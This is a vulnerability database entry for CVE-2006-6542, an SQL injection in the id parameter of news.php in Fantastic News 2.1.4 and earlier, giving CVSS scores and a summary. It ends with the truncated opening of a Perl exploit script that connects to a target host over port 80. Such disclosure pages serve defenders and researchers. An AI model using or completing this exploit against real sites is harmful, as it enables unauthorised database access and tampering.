7.5
CVSSv2

CVE-2006-6542

Published: 14/12/2006 Updated: 19/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in news.php in Fantastic News 2.1.4 and previous versions allows remote malicious users to execute arbitrary SQL commands via the id parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

fantastic news fantastic news

Exploits

#!perl #Download:fscriptscom/downloadphp?file=1 use IO::Socket; #dc3dlam if (@ARGV<3) { &header; } else { &get(); } sub get() { $host=$ARGV[0]; $path=$ARGV[1]; $id=$ARGV[2]; $socket=IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>80) or die ("[-]Error\n"); print "[~]Connecting!\n"; print "[~]Gettin ...